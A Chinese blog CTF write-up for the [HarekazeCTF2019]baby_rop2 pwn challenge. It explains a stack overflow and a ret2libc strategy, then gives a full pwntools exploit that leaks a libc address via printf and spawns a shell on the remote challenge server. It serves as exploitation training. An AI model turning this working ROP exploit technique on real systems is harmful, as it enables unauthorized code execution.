[HarekazeCTF2019]baby_rop2

最新推荐文章于 2024-05-05 22:46:05 发布
最新推荐文章于 2024-05-05 22:46:05 发布
阅读量985 收藏
点赞数
分类专栏: BUU-PWN 文章标签: pwn CTF WriteUP python 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0sway/article/details/124009597
版权

[HarekazeCTF2019]baby_rop2

使用checksec查看:
在这里插入图片描述

只开启了栈不可执行。

先放进IDA中分析:
在这里插入图片描述

  • v3 = read(0, buf, 0x100uLL);:变量buf可读入0x100大小的数据,距离rbp 0x20,存在栈溢出。

题目思路

  • 在静态代码审计的时候只发现了一个栈溢出漏洞。
  • 程序中没有system()函数,也没有/bin/bash字符串。
  • 考虑用ret2libc的方式去做。

步骤解析

64位程序传参的时候是先会使用寄存器的,所以我门先要找到可用的rdirsi地址。

rsi采用第二个,r15在本次pwn中使用不到,直接置为0即可。

接着只需要套用ret2libc的公式就能getshell了。

注意有个坑:需要使用read@gotprintf@got不知道为啥使用不了。

在getshell之后还有个小坑:flag不在当前目录,在/home/babyrop2/flag下。

在这里插入图片描述

完整exp

from pwn import *

#start
r = remote("node4.buuoj.cn",26613)
# r = process("../buu/[HarekazeCTF2019]baby_rop2")
elf = ELF("../buu/[HarekazeCTF2019]baby_rop2")
libc = ELF("../buu/ubuntu16(64).so")

#params
rdi_addr = 0x400733
rsi_r15_addr = 0x400731
main_addr = elf.symbols['main']
printf_plt=elf.plt['printf']
read_got=elf.got['read']
format_str = 0x400770

#attack
payload=b'M'*(0x20+8) + p64(rdi_addr) + p64(format_str) + p64(rsi_r15_addr) + p64(read_got) + p64(0) + p64(printf_plt) + p64(main_addr)
r.recv()
r.sendline(payload)
read_addr = u64(r.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
print("read_addr: " + hex(read_addr))

#libc
base_addr = read_addr - libc.symbols['read']
system_addr = base_addr + libc.symbols['system']
bin_sh_addr = base_addr + next(libc.search(b'/bin/sh'))
print("system_addr: " + (hex(system_addr)))
print("bin_sh_addr: " + (hex(bin_sh_addr)))

#attack2
payload=b'M'*(0x20+8) + p64(rdi_addr) + p64(bin_sh_addr) + p64(system_addr)
r.recv()
r.sendline(payload)

r.interactive()
m0sway
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF pwn [HarekazeCTF2019]baby_rop2
菜的只能随便写写博客
02-17 1656
0x01 文件分析   0x02 运行  和babyrop一样。   0x03 IDA  程序流程和babyrop差不多,但是这个里面没有提供可用的gadget,需要自己完成rop。   0x04 思路  没有默认的gadget,需要自己构建,需要利用栈溢出和printf函数泄露libc版本和libc基址,再构建rop。需要注意的是printf函数需要用到的参数,第一个参数需要为格式化字符...
HarekazeCTF2019 baby_rop2
pondzhang的专栏
05-07 236
from pwn import * p = process('./babyrop2') libcelf = ELF('./libc-2.23.so') p = process('./babyrop2') p.recvuntil("What's your name? ") pltprintf = 0x00000000004004F0 gotread = 0x0000000000601020 popr...
buuctf [HarekazeCTF2019]baby_rop2
carol2358的博客
04-21 438
一道常规的泄漏libc然后rop的题目 exp: from pwn import * from LibcSearcher import * local_file = './babyrop2' local_libc = './libc.so.6' remote_libc = './libc.so.6' select = 1 if select == 0: r = proce...
[HarekazeCTF2019]baby_rop[BUUCTF]
最新发布
moonlightsunshin的博客
05-05 265
这个时候思路就很清晰了根据64位函数传参的特点构造ROP链就行,32位与64位传参的区别这里就不再赘述,读者可以看上一篇jarvisoj_level2_x64[BUUCTF] ,根据名字可以猜到这道题考的rop同时是64位的程序。用find -name flag查找路径再cat。
[BUUCTF]PWN——[HarekazeCTF2019]baby_rop2
mcmuyanga的博客
10-04 4190
[HarekazeCTF2019]baby_rop2 题目附件 步骤: 例行检查,64位,开启了nx保护 运行了一下程序,了解大概的执行情况 64位ida载入,shift+f12检索程序里的字符串,没有发现可以直接利用的,从main函数开始看程序 利用思路: 程序很简单,buf的大小是0x20,但是读入的时候读入的是0x100,会造成溢出,我们要想办法覆盖返回地址为” system(‘/bin/sh’)“,那样在执行13行语句的时候,程序回去调用我们布置好的栈,从而得到shell 但是程序里没有现成
[PWN] BUUCTF [HarekazeCTF2019]baby_rop2
空城惜梦的博客
06-09 395
[PWN] BUUCTF [HarekazeCTF2019]baby_rop2解题分析漏洞利用payload解析payload 解题分析 按照惯例先checksec,发现开了nx和RELRO,又因为题目给了文件libc.so.6,所以猜测要需要构造ROP来布置程序执行路线图 运行程序来观察程序的逻辑,发现需要输入name,然后程序再把输入的name打印出来 64位IDA打开,发现buf缓冲区只有0x20个字节大小,但read却可以往buf缓冲区中写入0x100个字节,所以这里存在着栈溢出 shift+
[PWN] 泄露libc HarekazeCTF_2019_baby_rop2
LDX的博客
11-28 627
pwn 64位 泄露libc版本
rop-sample.rar_.comrop_rop_rop源码下载_taobao netty
09-20
基于ROP的SAMPLE开发代码,属于通信框架的一部分。ROP是淘宝提供的一种开发协议框架,底层基于NETTY。
pwn学习资料整理——ROP技术(pwn_rop2)
08-30
pwn学习资料整理——ROP技术(pwn_rop2)
arm64_rop_exploit:Arm64返回定向编程(ROP)漏洞
03-02
在运行Ubuntu 18.04.4 LTS(GNU / Linux 4.15.0-1062-raspi2 aarch64)的Raspberry Pi上测试了arm64代码。执照有关详细信息,请参阅文件。rop.py关于该项目将研究漏洞的利用以及面向收益的编程的使用。 这将建立在...
pwn学习资料整理——ROP技术(pwn_rop1)
08-30
pwn学习资料整理——ROP技术(pwn_rop1)
STM8_Unlock_Flash_ROP_issue_ROPCLEAR_unlock_stm8s003_stm8s103_
10-03
STM8S103
[BUUCTF-pwn]——[HarekazeCTF2019]baby_rop2
Y_peak的博客
02-14 259
[BUUCTF-pwn]——[HarekazeCTF2019]baby_rop2 题目地址:https://buuoj.cn/challenges#[HarekazeCTF2019]baby_rop2 checksec一下,64位,开启NX,应该要用到ROPgadget,先看看 在IDA中 思路 利用printf先leek出来一个地址,这里选用了read的地址。找到libc,计算偏移,最终算出,system函数地址和’/bin/sh’字符串的地址。由于是64位,注意寄存器储存参数。(参数小于等于
[HarekazeCTF2019]baby_rop
、moddemod
06-12 383
exp from pwn import * context(log_level = 'debug') proc_name = './babyrop' elf = ELF(proc_name) # p = process(proc_name) p = remote('node3.buuoj.cn', 25587) pop_rdi_ret = 0x400683 bin_sh_str = 0x601048 system_addr = elf.sym['system'] payload = 'a'.en...
BUUCTF pwn [HarekazeCTF2019]baby_rop
菜的只能随便写写博客
02-13 2554
0x01 文件分析   0x02 运行  一组回显   0x03 IDA  程序之中存在system函数,通过搜索字符串,还能得到’/bin/sh’字符串,一个简单的rop。   0x04 思路  简单rop,利用万能的gadget,pop rdi ret传入字符串并调用system,得到shell。此题flag的位置在/home/babyrop内,可以通过find -name flag...
buuctf27 [HarekazeCTF2019]baby_rop2 1
weixin_74861133的博客
11-20 144
只开启了NX保护。
[BUUCTF]PWN [HarekazeCTF2019]baby_rop2
m0_50819561的博客
09-25 186
惯例checksec发现开了,但也没开。 打开IDA进行分析 main函数很简洁,也没有内套其他函数。有一个很明显的溢出漏洞,可以通过read函数来把♂栈♂填♂满。那么如果我们把ret地址填写成我们想要的函数,就可以对他进行调用。看看本题题目,名副其实了属于是。 很明显,我们可以使用printf函数泄露libc基址。 printf函数的形式大概像这样:printf(“%s“,Moriarty),其中格式化字符串是第一个参数,放在rdi中,第二个参数放在rsi中。很明显的,我们应该想办法把rdi覆盖成一个.
BUUCTF [HarekazeCTF2019]baby_rop
小白垃圾笔记2
05-13 185
不过因为这是64位程序,所以我们需要找一些东西的地址。main函数里直接是漏洞 ,第6行存在栈溢出。/bin/sh (当作system的参数)小白做题垃圾笔记,不建议阅读。system(调用系统函数·)pop rdi (用来传参)一次打不通可以多打几次。ret(用来栈对齐)

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值